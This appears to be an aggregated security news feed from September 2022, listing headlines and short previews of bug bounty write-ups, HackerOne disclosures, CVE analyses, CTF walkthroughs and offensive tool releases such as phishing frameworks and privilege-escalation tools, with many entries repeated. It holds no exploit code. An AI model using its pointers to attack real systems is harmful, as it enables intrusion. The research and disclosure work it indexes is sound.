    In this article, I am going to provide feedback and helpful tips for the eWPT and eWPTXv2 exams. Continue reading on System Weakness »
    Genymotion Virtualbox configuration error solved !!
    After an Windows update , I am facing virtualbox error . I tried with genymotion help center https://support.genymotion.com/hc/en-us . Continue reading on Medium »
    Shopping App Deeplink Arbitrary URLs
    In this write-up, I’ll tell you how I was able to launch Arbitrary URLs to the internal web of the shopping application. Continue reading on Medium »
    Stored XSS at Nvidia via Angular JS template injection
    Hello security folks  , I’m gonna talk about how I got Stored XSS at Nvidia Continue reading on Medium »
  • Open

    Learn NMAP to find your first Network Vulnerability
    Article URL: https://hackerask.com/articles/how-to-use-nmap-to-find-vulnerabilities.html Comments URL: https://news.ycombinator.com/item?id=32972486 Points: 2 # Comments: 1
  • Open

    Comprehensive List of CVE PoC's
    Article URL: http://www.jamessawyer.co.uk/pub/cve_links.txt Comments URL: https://news.ycombinator.com/item?id=32972064 Points: 1 # Comments: 0
  • Open

    Thinkphp3.2.3-漏洞审计汇总
    使用框架相当于别人已经帮助完成一些基础工作,开发者只需要集中精力在系统的业务逻辑设计上即可。而且相较于原生代码开发更稳定、安全、易扩展。
    【前沿解读】斯坦福研究员论文-以太坊可逆交易标准ERC20721R的机制、创新与局限
    不可逆转的机制,谁能发起?如何冻结?谁能仲裁?
    DotNet安全-IIS请求流程及渗透测试中的应用
    DotNet安全-IIS请求流程及渗透测试中的应用,常见IIS后门利用。 团队公众号 7bits安全团队 ,欢迎关注~
  • Open

    SPY NEWS: 2022 — Week 38
    Summary of the espionage-related news stories for the Week 38 (September 18–24) of 2022. Continue reading on Medium »
  • Open

    late night g/g 'adult' entertainment!
    Mods/Admins - I did due diligince to ensure this wasn't a repost. If it is - please feel free to kill the post..... http://162.243.172.84/ submitted by /u/LucasImages [link] [comments]
  • Open

    Cracking Linux Password Hash with John The Ripper
    In this short tutorial I will share how can you crack Linux password hash using John the Ripper. Let’s begin. Continue reading on Medium »

  • Open

    Zero Trust - From Zero to One Hundred
    submitted by /u/Khryse [link] [comments]
    The “Privileges Required” trap in CVSS 3.1
    submitted by /u/DebugDucky [link] [comments]
    Hacking the PS4 / PS5 through the PS2 Emulator - Part 1 - Escape
    submitted by /u/digicat [link] [comments]
  • Open

    best methods for access kernel mode from user mode(Windows)
    What are the ways to access kernel mode from user mode? Which of these methods is better for 2022 and 2023? Which methods are obsolete? submitted by /u/soupcreamychicken [link] [comments]
    Hacking the PS4 / PS5 through the PS2 Emulator - Part 1 - Escape
    submitted by /u/digicat [link] [comments]
  • Open

    Skidaddle Skideldi - I just pwnd your PKI
    submitted by /u/dmchell [link] [comments]
    Ever wondered how AV knows your new beacon is malicious?
    submitted by /u/Diesl [link] [comments]
    evilgophish Now Supports SMS Smishing Campaigns
    Up until now, there was no open-source phishing framework that supports SMS campaigns by default. submitted by /u/edreatingmonkey [link] [comments]
  • Open

    Is there a particular way to search ODCrawler or are mostly dead links to be expected?
    For example, I was trying to find ODs with curb you enthusiasm and there's literally nothing, which is very surprising to me. I just searching the show title not a good way to go about it or what? Or is curb not that popular and I should just accept no ODs have it? submitted by /u/Seahearse01 [link] [comments]
  • Open

    TRY HACK ME: Threat Intelligence Tools Write-Up
    Task 1 Room Outline- Continue reading on Medium »
  • Open

    How I was able to find 150+ vulnerable applications to CVE-2022–26134 | A Zero-day RCE
    From shodan dorks to filter out vulnerable hosts. Continue reading on Medium »
    Bug Bounty | Detailed definition of Bug Bounty by CyberHacks
    If you’re looking to have a rewarding job, with the ability to work in an exciting industry. Continue reading on Medium »
    SSRF IN-DEPTH…
    Hello mates, welcome back to my another blog. Continue reading on Medium »
    OWASP Top-10 [2021] for Bug Bounty Hunters (Day-5)
    Hello geeks, it’s Selim back here with another interesting article. Continue reading on Medium »
    Escalating SSTI to Reflected XSS using curly braces { }
    SSTI -> Self XSS -> RXSS Continue reading on Medium »
  • Open

    SecWiki News 2022-09-24 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-24 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    How to exploit a stored XSS vulnerability on DVWA — StackZero
    This is a walkthrough in exploiting stored XSS on DVWA, with the side effect of letting a deeper understanding of that vulnerability. Continue reading on InfoSec Write-ups »
    Understanding the NMAP methodology — Part 2
    No content preview
  • Open

    How to exploit a stored XSS vulnerability on DVWA — StackZero
    This is a walkthrough in exploiting stored XSS on DVWA, with the side effect of letting a deeper understanding of that vulnerability. Continue reading on InfoSec Write-ups »
    Understanding the NMAP methodology — Part 2
    No content preview
  • Open

    How to exploit a stored XSS vulnerability on DVWA — StackZero
    This is a walkthrough in exploiting stored XSS on DVWA, with the side effect of letting a deeper understanding of that vulnerability. Continue reading on InfoSec Write-ups »
    Understanding the NMAP methodology — Part 2
    No content preview
  • Open

    Where are the big bucks?
    Right now I'm doing alright in the space, but sure as hell isn't Silicon Valley. How do you maximize your income in this field? Become very, very skilled at a niche issue? Start your own company? submitted by /u/FAlady [link] [comments]
    iPhone event logs from iTunes backup is possible?
    Hello friends, Generally, i'm using screen time function like an event viewer for give me an idea about my app usage but it's only shows 2-3 weeks ago but i want to see more than that time, like 5 months ago if it's possible. From my research, i found the KnowledgeC.db file has wide range of event logs of an iphone but i'm not sure about the encrypted itunes backup will give this KnowledgeC.db file to me. If i would gain access that file with itunes backup, i'm thinking to use iLeapp for parsing iphone data. And the other question is; how long does KnowledgeC.db file hold these logs actually? Can i see 5 months ago from now? If the answer is "no" what are my options? Basically, I want to see my iphone's all app usage data, device locks/unlocks and connected/plugged any device info from 5 months ago. I'm waiting your valuable replies, thank you very much in advance... submitted by /u/Sad-Lemon-1997 [link] [comments]
    Has anyone here worked E-Discovery or is a CFE?
    I’m applying to internships for E-discovery and fraud analysis, with a background in Network Security but I’m stuffing Computer Forensics for my Bachelor’s so I really want to utilize my coursework to build a career off of. Moving on from retail I want to find my fitting and land a internship within the CF field submitted by /u/OhmyMary [link] [comments]
  • Open

    Snapshot fuzzing with WTF
    A few months back I was fuzzing a target with winafl but I wasn't satisfied with the result. My target wasn't working well while… Continue reading on Medium »
  • Open

    Snapshot fuzzing with WTF
    A few months back I was fuzzing a target with winafl but I wasn't satisfied with the result. My target wasn't working well while… Continue reading on Medium »
  • Open

    Cobaltstrike RCE 漏洞CVE-2022-39197复现
    漏洞简述该漏洞存在于Cobalt Strike的Beacon软件中,可能允许攻击者在Beacon配置中设置格式错误的用户名,触发XSS,从而导致在CS服务端上造成远程代码执行。前期准备环境信息:192
    OSCP-Vulnhub靶机记录-bravery-walkthrough
    靶机地址https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/安装靶机打开kali,扫存活主机nmap -sP 192.168.160.0/24靶机ip192.168.160.128扫一波端口和服务:./nmapAuto -H 192.168.160.128 -t AllPORT STATE SERVICE22/tcp open s
    AI如何走向精智能之路?
    斯坦福大学一项新的研究表明,人工智能可以通过问一些看起来很愚蠢的问题来帮助它们变得更加聪明。
  • Open

    Establishing Persistence via Shortcut Links
    Welcome offensive ninjas, when doing red teaming or internal penetration testing, we must maintain local access as stealthy as possible… Continue reading on Medium »
  • Open

    Cable Haunt (Vulnerability)
    Article URL: https://en.wikipedia.org/wiki/Cable_Haunt Comments URL: https://news.ycombinator.com/item?id=32959731 Points: 3 # Comments: 0

  • Open

    Improving the hunting of exposed information of our organization through a free account of…
    The following information is only for educational purposes, the autor is not responsable for the use given to the information provided in… Continue reading on Medium »
    Arbitrary File Corruption: End - to - End Encrypted Messaging Application
    In this write-up, I’ll tell you how I was able to Exfiltrate Database and Sandbox Files on End-to-End Encrypted Messaging Application. Continue reading on Medium »
    WAF bypasses via 0days
    based on findings from a live hacking event Continue reading on Medium »
    My First Valid Bug “Bypass the Admin Panel”
    Hey everyone, I am Digant Prajapati. Cyber Security Enthusiast and currently focusing on bug bounty💸. Continue reading on Medium »
    List of Cybersecurity YouTubers for Beginners
    This is a list of top 10 cybersecurity-related YouTube channels that I found extremely practical for beginners. Continue reading on Medium »
    My First XSS
    Hey everyone, I am SYRINE. Cyber Security Enthusiast, eJPT Certified, and currently focusing on bug bounty. Continue reading on Medium »
    Bypassing CSRF Protection (II)
    Hi, My name is Hashar Mujahid and in this blog, we will talk about some techniques to bypass the csrf protection. Continue reading on InfoSec Write-ups »
  • Open

    Geolocation #4 — Wagner vs Rosgvardia
    On 16/09/2022, Twitter user @Ukrainene tweeted the following video consisting of an argument and fight between a member of Wagner PMC and… Continue reading on Medium »
    Challenge c’est où donc ?
    Challenge proposé sur le Discord OSINT FR. Vous trouverez ci-après la correction. Continue reading on Medium »
    Challenge 3 niveaux
    Challenge proposé sur le Discord OSINT FR. Vous trouverez ci-après la correction. Continue reading on Medium »
    Challenge je ne parle pas chinois
    Challenge proposé sur le Discord OSINT FR. Vous trouverez ci-après la correction. Continue reading on Medium »
    Challenge Street Art
    Challenge proposé sur le Discord OSINT FR. Vous trouverez ci-après la correction. Continue reading on Medium »
    Challenge-русский-вызов
    Challenge proposé sur le Discord OSINT FR. Vous trouverez ci-après la correction. Continue reading on Medium »
  • Open

    Malware Targeting dYdX Crypto Exchange
    submitted by /u/louis11 [link] [comments]
    CVE-2022-35256 - HTTP Request Smuggling in NodeJS
    submitted by /u/VVX7 [link] [comments]
    Tool for Sizing Solidity Smart Contract Audits
    submitted by /u/kruksym [link] [comments]
    How to secure against forced browsing info disclosures
    submitted by /u/pm_me_security_jobs [link] [comments]
    ModSecurity WAF bypasses via 0days
    submitted by /u/Gallus [link] [comments]
    metamaska - malevolent payload classifier
    submitted by /u/c0daman [link] [comments]
    Passkeys - an opinionated, “quick-start” guide to using passkeys
    submitted by /u/Gallus [link] [comments]
    BigQuery SQL Injection Cheat Sheet
    submitted by /u/Gallus [link] [comments]
  • Open

    Offensive Security Learn Together
    Hey guys! I am looking for people who are into Offensive // Defensive Security and want to level up and gain knowledge together by doing CTF's , Boxes, and OSCP related Practice . Just want to add some friends so that we can have motivation from each other’s daily activity and of course healthy competition. if you are interested leave you discord so i can add you submitted by /u/PanDosKi [link] [comments]
    There’s a ton of blogs etc over the years showing how to use bettercap, Alfa antenna etc but how feasible is it to crack wifi networks nowadays using these tools aside from old WPA networks, am I right in thinking that the only folks who can do this successfully are people who invest in GPU power
    submitted by /u/HamburgersNHeroin [link] [comments]
    Steal WiFi Login for Enterprise Networks
    submitted by /u/tbhaxor [link] [comments]
  • Open

    [CVE-2022-35949]: undici.request vulnerable to SSRF using absolute / protocol-relative URL on pathname
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 - Bounty: $1200
    CVE-2022-35948: CRLF Injection in Nodejs undici via Content-Type
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 - Bounty: $600
    CVE-2022-38362: Apache Airflow Docker Provider <3.0 RCE vulnerability in example dag
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1671140 - Bounty: $4000
    com.basecamp.bc3 Webview Javascript Injection and JS bridge takeover
    Basecamp disclosed a bug submitted by fr4via: https://hackerone.com/reports/1343300 - Bounty: $1210
  • Open

    A technical analysis of the leaked LockBit 3.0 builder
    submitted by /u/CyberMasterV [link] [comments]
    What is the difference between FTK and AD Lab?
    What is the difference between FTK and AD Lab? submitted by /u/Least_Lab375 [link] [comments]
  • Open

    SecWiki News 2022-09-23 Review
    基于统一结构生成的网安信息抽取研究 by ourren 浅谈甲方单位的漏洞管理 by ourren 加密流量安全背后的那些小秘闻 by ourren 揭露大佬挖主应用的一般性流程 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-23 Review
    基于统一结构生成的网安信息抽取研究 by ourren 浅谈甲方单位的漏洞管理 by ourren 加密流量安全背后的那些小秘闻 by ourren 揭露大佬挖主应用的一般性流程 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    网络犯罪案例分析-倒卖火车票(五十二)
    利用抢票软件,倒卖火车票,获利2000元,触犯倒卖车票罪,判处有期徒刑六个月。
    FreeBuf早报 | 17岁少年疑似《GTA6》泄露元凶;Meta被指秘密跟踪iPhone用户
    伦敦警方通报称,他们已经在牛津郡逮捕到了一名涉嫌网络攻击事件的 17 岁少年黑客,并表示他目前仍在被拘留,但没有公布任何其他细节。
    FreeBuf周报 | Python曝出15年老洞可影响35万余项目;印尼通过数据隐私法
    我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    浏览器扩展:比你想象得更危险
    本文将以最常见的恶意扩展系列为例,揭秘浏览器扩展程序的隐藏威胁。
    “羊了个羊”一直在被黑客攻击!
    “羊了个羊”自上线以来就一直饱受黑客攻击,导致很长一段时间内游戏服务器崩溃,严重影响用户游戏体验。
    研究人员披露了 Oracle 云基础设施中的严重漏洞,现已修复
    研究人员发现了一个严重的 Oracle 云基础设施 (OCI) 漏洞,目前已修复。
    从近期欧美法规看软件供应链安全趋势
    前言近期美国和欧盟都发布了新的供应链安全相关要求法案,要求厂商评估供应链数字化产品的安全性,此举旨在保护供应链安全,防止SolarWinds 等安全事件的再次发生。美国和欧盟在各自的法案都提到了软件安全检测,软件物料清单(SBOM)等内容,这意味着通过强制性的网络安全法规要求,企业必须通过披露SBOM、源代码安全检测等手段提升数字化产品安全性,才能继续正常地销售提供数字化产品。美国白宫在9月14日
    Python 15年未修的漏洞可能影响 35万余个项目,速查
    Python模块中存在一个长达15年未修复的安全漏洞,可能导致35万余个开源项目被利用。
    知物由学 | AI与黑产的攻守之道,详解攻击类文字图像的检测
    导读:随着 OCR 系统识别能力的提升,专业对抗 OCR 的黑产也越来越多,这个过程中 AI 如何抵御黑产攻击类的文字图像?本文通过分享相似性特征训练的常见算法,并选择了其中一些有代表性的工作进行介绍
    Lua脚本在Redis事务中的应用实践
    使用过Redis事务的应该清楚,Redis事务实现是通过打包多条命令,单独的隔离操作,事务中的所有命令都会按顺序地执行。事务在执行的过程中,不会被其他客户端发送来的命令请求所打断。事务中的命令要么全部被执行,要么全部都不执行(原子操作)。但其中有命令因业务原因执行失败并不会阻断后续命令的执行,且也无法回滚已经执行过的命令。如果想要实现和MySQL一样的事务处理可以使用Lua脚本来实现,Lua脚本中
    探寻丨助力案件侦破,它真有那么玄乎?
    大数据扫黄,真有这么玄乎?一文带你《探寻》数字经济时代下,大数据技术如何助力案件侦破!
    为什么黑客攻击交易平台,不攻击支付宝?
    先讲一个有意思的事情:前年,也就是2017年的时候,杭州发生了一起持刀抢劫案。有一对表兄弟约好了来杭州抢劫,然后两个人千里迢迢地赶来杭州,其中一个抢劫犯还是从云南坐飞机过来的。他们在西湖附近凤起路一带,连续持刀抢劫了3家便利店,结果总共才抢到现金1800元。的确,因为支付宝的存在,像杭州这样的城市几乎是已经进入了一个无现金社会,变相断了抢劫犯的生路。你是否想过这样一个问题:为什么支付宝不会被黑客黑
  • Open

    How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty
    No content preview
    Bypassing CSRF Protection (II)
    No content preview
  • Open

    How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty
    No content preview
    Bypassing CSRF Protection (II)
    No content preview
  • Open

    How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty
    No content preview
    Bypassing CSRF Protection (II)
    No content preview
  • Open

    utilman.exe — Explorando o recurso de Facilidade de acesso
    Como você já deve estar familiarizado o utilman.exe ou Utility Manager é um recurso do sistema operacional que lhe permite realizar as… Continue reading on 100security »
  • Open

    Crow HTTP framework use-after-free
    (Collaborative post by hebi and Gynvael Coldwind) Crow is an asynchronous C++ HTTP/WebSocket framework for creating "flask-like" web services. In early August we discovered a pretty interesting use-after-free vulnerability. Since Crow takes advantage of the Asio library for asynchronous input/output operations, analysis of this vulnerability took a few long evenings since the cause was split between multiple interweaved tasks and callbacks. Eventually we traced the root cause to an interesting mismatch between two layers of code, one of which - the HTTP parser - was supporting HTTP pipelining (or rather was agnostic towards it, which resulted in pipelining being inadvertently supported), while the other - HTTP server logic - was not designed to take HTTP pipelining into account. This r…
    Crowbleed (Crow HTTP framework vulnerability)
    (Collaborative post by Gynvael Coldwind and hebi) Crow is an asynchronous C++ HTTP/WebSocket framework for creating "flask-like" web services. While analyzing another vulnerability we've found a Cloudbleed-like information disclosure bug in the code path responsible for serving static files. Technically no special action on attacker's side was required - it was enough to request a static file smaller than 16KB and the server would send the file padded with uninitialized stack content (up to 16KB) back. The vulnerability in question was reported mid-August and fixed within 6 days. CVSS, CVE, etc Human readable details are in the next section. CVE: CVE-2022-38668 CVSS 3.1: 5.3 Medium (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) [as originally reported] CVSS 3.1: 7.5…

  • Open

    Open Redirect on www.redditinc.com via `failed` query param
    Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1257753 - Bounty: $500
    Content injection in Jira issue title enabling sending arbitrary POST request as victim
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1533976 - Bounty: $8690
    Unauthenticated IP allowlist bypass when accessing job artifacts through gitlab pages at `{group_id}.gitlab.io`
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1591412 - Bounty: $1990
    getUsersOfRoom discloses users in private channels
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1410357
    Rocket.chat user info security issue
    Rocket.Chat disclosed a bug submitted by mikolajczak: https://hackerone.com/reports/1517377
    Message ID Enumeration with Regular Expression in getReadReceipts Meteor method
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1377105
    API route chat.getThreadsList leaks private message content
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1446767
    NoSQL-Injection discloses S3 File Upload URLs
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1458020
    getRoomRoles Method leaks Channel Owner
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1447440
    TOTP 2 Factor Authentication Bypass
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1448268
    Message ID Enumeration with Action Link Handler
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1406953
    REST API gets `query` as parameter and executes it
    Rocket.Chat disclosed a bug submitted by paulocsanz: https://hackerone.com/reports/1140631
    Unintended information disclosure in the Hubot Log files
    Rocket.Chat disclosed a bug submitted by rolfzur: https://hackerone.com/reports/1394399
    Bypass local authentication (PIN code)
    Rocket.Chat disclosed a bug submitted by dago_669: https://hackerone.com/reports/1126414
    getUserMentionsByChannel leaks messages with mention from private channel
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1410246
    It is possible to elevate privileges for any authenticated user to view permissions matrix and view Direct messages without appropriate permissions.
    Rocket.Chat disclosed a bug submitted by garretby: https://hackerone.com/reports/917946
    Persistent CSS injection with marked markdown parser in Rocket.Chat
    Rocket.Chat disclosed a bug submitted by danieljpp: https://hackerone.com/reports/1401268
    Regex account takeover
    Rocket.Chat disclosed a bug submitted by ghaem51: https://hackerone.com/reports/1581059
    XSS in ZenTao integration affecting self hosted instances without strict CSP
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1542510 - Bounty: $13950
    DLL Search-Order Hijacking Vulnerability in work-64-exe-v7.16.3-1.exe
    8x8 disclosed a bug submitted by is-: https://hackerone.com/reports/1519437
  • Open

    Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
    submitted by /u/digicat [link] [comments]
    Making HTTP header injection critical via response queue poisoning
    submitted by /u/albinowax [link] [comments]
    A technical analysis of the leaked LockBit 3.0 builder
    submitted by /u/CyberMasterV [link] [comments]
    Raspberry Robin’s Roshtyak: A Little Lesson in Trickery
    submitted by /u/stashing_the_smack [link] [comments]
    Bypassing FileBlockExecutable in Sysmon 14.0: A Lesson In Analyzing Assumptions
    submitted by /u/darronofsky [link] [comments]
    Exploiting Web3’s Hidden Attack Surface: Universal XSS on Netlify’s Next.js Library
    submitted by /u/Mempodipper [link] [comments]
    Breaking Bitbucket: Pre Auth Remote Command Execution (CVE-2022-36804)
    submitted by /u/Mempodipper [link] [comments]
    Dissecting and MITMing Duo Device Health App
    submitted by /u/sanitybit [link] [comments]
    AWS IAM Identity Center Access Tokens are Stored in Clear Text and No, That’s Not a Critical…
    submitted by /u/csanders_ [link] [comments]
  • Open

    Vetting mobile forensic options
    Does anyone know if there is something that can be previewed while connected to a mobile device and create a logical image from it? The challenge is not to have it read from the backup and don’t want a full physical or logical image. Is there such product? submitted by /u/hw60068n [link] [comments]
    How to recover text/metadata from malware doc
    Have a requirement to be able to extract data from a malware ridden pdf, word excel etc... Basically we would want to retrieve the important data like text and meta data and leave behind everything else submitted by /u/InfosecDub [link] [comments]
    Seeking To Buy Replacement UFED Device Adapter.
    Hi all! Looking to buy a UFED Device Adapter. The neato little USB one with the LAN port on it and whatnot. Can pay quite a few dollars. ​ Let me know, would love to hear from you <3 submitted by /u/BrokenToasterOven [link] [comments]
  • Open

    How to Fix Google Ads Disapproved Due to Malicious or Unwanted Software
    It’s estimated that 98.5% of sites who advertise use Google Ads to generate revenue and bring in traffic. That’s a hefty number of websites who leverage the popular platform to publish and serve ads. And while most webmasters are keenly aware that a hack can significantly impact your site’s revenue and organic rankings, malicious code or software can also affect your ability to run ads on Google and other advertising platforms. Your Google Ads must be trustworthy and relevant — this policy applies to your website as well. Continue reading How to Fix Google Ads Disapproved Due to Malicious or Unwanted Software at Sucuri Blog.
  • Open

    How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty
    Hi everybody, SQL Injection is one of the most critical vulnerabilities that can be found in web applications I will show you today how I… Continue reading on InfoSec Write-ups »
    Immunefi Raises $24m for Series A to Secure Web3
    Today, we’re announcing that we’ve raised $24m for our Series A round, led by Framework Ventures and joined by other investors like… Continue reading on Immunefi »
    Instagram Bug : $45,000 awarded to an Indian Student
    An Indian Student found a bug in Instagram Continue reading on Medium »
  • Open

    What Is Data Exfiltration? MITRE ATT&CK® Exfiltration Tactic | TA0010
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Malicious OAuth applications used to compromise email servers and spread spam
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Books, Software, and Other Stuff
    https://files.dog http://204.16.243.178 submitted by /u/ilikemacsalot [link] [comments]
  • Open

    SecWiki News 2022-09-22 Review
    威胁情报分析工具集的docker 镜像 by ourren phar反序列化学习 by SecIN社区 rengine: 自动化信息收集的平台 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-22 Review
    威胁情报分析工具集的docker 镜像 by ourren phar反序列化学习 by SecIN社区 rengine: 自动化信息收集的平台 by ourren 更多最新文章,请访问SecWiki
  • Open

    AWS control tower — the best way to govern multi-account environments
    Anyone who has worked in the cloud knows how quickly this environment can increase in complexity as more and more workloads get migrated… Continue reading on InfoSec Write-ups »
    Write-up: JWT authentication bypass via jwk header injection @ PortSwigger Academy
    This write-up for the lab JWT authentication bypass via jwk header injection is part of my walk-through series for PortSwigger’s Web… Continue reading on InfoSec Write-ups »
    OSINT Information Gathering with Informer
    No content preview
    Understanding the NMAP methodology — Part 1
    No content preview
    Try Hack Me: Basic Pentesting Walkthrough
    No content preview
    Try Hack Me: Intro to Digital Forensics Walkthrough
    No content preview
    How I hacked an exam portal and got access to 10K+ users data including webcams
    No content preview
  • Open

    AWS control tower — the best way to govern multi-account environments
    Anyone who has worked in the cloud knows how quickly this environment can increase in complexity as more and more workloads get migrated… Continue reading on InfoSec Write-ups »
    Write-up: JWT authentication bypass via jwk header injection @ PortSwigger Academy
    This write-up for the lab JWT authentication bypass via jwk header injection is part of my walk-through series for PortSwigger’s Web… Continue reading on InfoSec Write-ups »
    OSINT Information Gathering with Informer
    No content preview
    Understanding the NMAP methodology — Part 1
    No content preview
    Try Hack Me: Basic Pentesting Walkthrough
    No content preview
    Try Hack Me: Intro to Digital Forensics Walkthrough
    No content preview
    How I hacked an exam portal and got access to 10K+ users data including webcams
    No content preview
  • Open

    AWS control tower — the best way to govern multi-account environments
    Anyone who has worked in the cloud knows how quickly this environment can increase in complexity as more and more workloads get migrated… Continue reading on InfoSec Write-ups »
    Write-up: JWT authentication bypass via jwk header injection @ PortSwigger Academy
    This write-up for the lab JWT authentication bypass via jwk header injection is part of my walk-through series for PortSwigger’s Web… Continue reading on InfoSec Write-ups »
    OSINT Information Gathering with Informer
    No content preview
    Understanding the NMAP methodology — Part 1
    No content preview
    Try Hack Me: Basic Pentesting Walkthrough
    No content preview
    Try Hack Me: Intro to Digital Forensics Walkthrough
    No content preview
    How I hacked an exam portal and got access to 10K+ users data including webcams
    No content preview
  • Open

    Tarfile: Exploiting the World with a 15-Year-Old Vulnerability
    Article URL: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/tarfile-exploiting-the-world.html Comments URL: https://news.ycombinator.com/item?id=32939583 Points: 2 # Comments: 0
    Ask HN: User wants to disclose a vulnerability. What next?
    "Hi team, I found a vulnerability in your website and want to disclose it to you. Let me know if you have any active bug bounty program or is there any compensation for reporting vulnerabilities?" What's the correct course of action for a software team, or management, when a user asks to disclose a vulnerability they've found? Comments URL: https://news.ycombinator.com/item?id=32938408 Points: 4 # Comments: 3
  • Open

    Road To Nowhere — Geolocating a village in Myanmar from satellite imagery
    Solving this Hacktoria challenge the hard way. Continue reading on Medium »
    Learn OSINT(Reconnaissance) for ethical hacking and penetration testing
    OSINT is a critical skill to understand for any hacker and pentester. In this course, you will learn about OSINT (reconnaissance) focused… Continue reading on Medium »
  • Open

    Watch Out for UUIDs in Request Parameters
    The Plugin: https://github.com/GeoffWalton/UUID-Watcher Some time ago on the TrustedSec Security Podcast, I shared a Burp Suite plugin I developed to hunt Insecure Direct Object Reference (IDOR) issues where applications might be using UUIDs or GUIDs (unique identifiers) as keys, assuming discovery attacks will not be possible. The plugin produces a report that helps identify which... The post Watch Out for UUIDs in Request Parameters appeared first on TrustedSec.
  • Open

    Hilarious Problem The attempt to load "\x" as a raw bytes isn't, which layer does this?
    I just realized that the I not only have to get the offsets right, I also need to get the byte strings read correctly as bytes. This isn't documented as much as I would expect and is a major catch for doing this. Any thoughts? submitted by /u/FinanceAggravating12 [link] [comments]
  • Open

    The Five Stages of the Red Team Methodology
    Red Teaming is a multi-layered cyberattack simulation designed to test the efficiency of an organization’s security controls. Continue reading on Medium »
  • Open

    高防在防DDoS中的运用经验 | FreeBuf甲方群话题讨论
    高防服务器或高防IP往往被认为是不错的选择方案,二者有何差异?存在打不死的高防吗?
    FreeBuf早报 | 韩国战争纪念馆遭黑客攻击;中国联通回应被美FCC列入安全威胁清单
    韩国国防部下设的战争纪念馆近期遭到身份不明的黑客网络攻击,但没有因此泄露军方的军事资料。
    开源代码库攻击在三年间暴涨7倍
    攻击者将恶意代码置入开源软件组件,这些组件被分发到下游,危及众多被企业和消费者依赖的应用程序。
    五分之二美国消费者数据被盗,企业也难逃攻击者“毒手”
    过去一年中,大约五分之二美国消费者的个人信息被盗、泄露或滥用。
    【由浅入深_打牢基础】WebSocket的利用方式
    虽然每次访问都访问都会有这个websocket连接,这个东西在我学习网络的时候也了解过是什么,但是不太清楚有没有利用方式,所以研究一番。
  • Open

    erlang-distribution-protocol 安全问题研究
    作者:lxraa 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 由于目前公司部分业务使用erlang实现,中文互联网上对于erlang安全问题研究较少,为了了解erlang应用的安全问题本人结合代码和公开资料进行了一些研究。 本文为erlang安全研究项目中针对erlang distribution通信协议...
    CVE-2022-22963 SpringCloud Function SpEL 注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/3DECgzKcovoCQcdZLGXCzA 前言 在研究分析了CVE-2022-22980 Spring Data MongoDB SpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloud Function中的一个SpEL表达式注入漏洞,...
    CVE-2022-34916 Apache Flume 远程代码执行漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ 项目介绍 Apache Flume 是一个分布式的,可靠的,并且可用于高效地收集,汇总和移动大量日志数据的软件。它具有基于流数据流的简单而灵活的体系结构。它具有可调的可靠性机制以及许多故障转移和恢复机制,并且具有健壮性和容错性。它使用一个...
  • Open

    erlang-distribution-protocol 安全问题研究
    作者:lxraa 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 由于目前公司部分业务使用erlang实现,中文互联网上对于erlang安全问题研究较少,为了了解erlang应用的安全问题本人结合代码和公开资料进行了一些研究。 本文为erlang安全研究项目中针对erlang distribution通信协议...
    CVE-2022-22963 SpringCloud Function SpEL 注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/3DECgzKcovoCQcdZLGXCzA 前言 在研究分析了CVE-2022-22980 Spring Data MongoDB SpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloud Function中的一个SpEL表达式注入漏洞,...
    CVE-2022-34916 Apache Flume 远程代码执行漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ 项目介绍 Apache Flume 是一个分布式的,可靠的,并且可用于高效地收集,汇总和移动大量日志数据的软件。它具有基于流数据流的简单而灵活的体系结构。它具有可调的可靠性机制以及许多故障转移和恢复机制,并且具有健壮性和容错性。它使用一个...

  • Open

    FilelessRemotePE: Loading fileless remote PE from URI to memory
    submitted by /u/sanitybit [link] [comments]
    Giving JuicyPotato a second chance: JuicyPotatoNG
    submitted by /u/splinter_code [link] [comments]
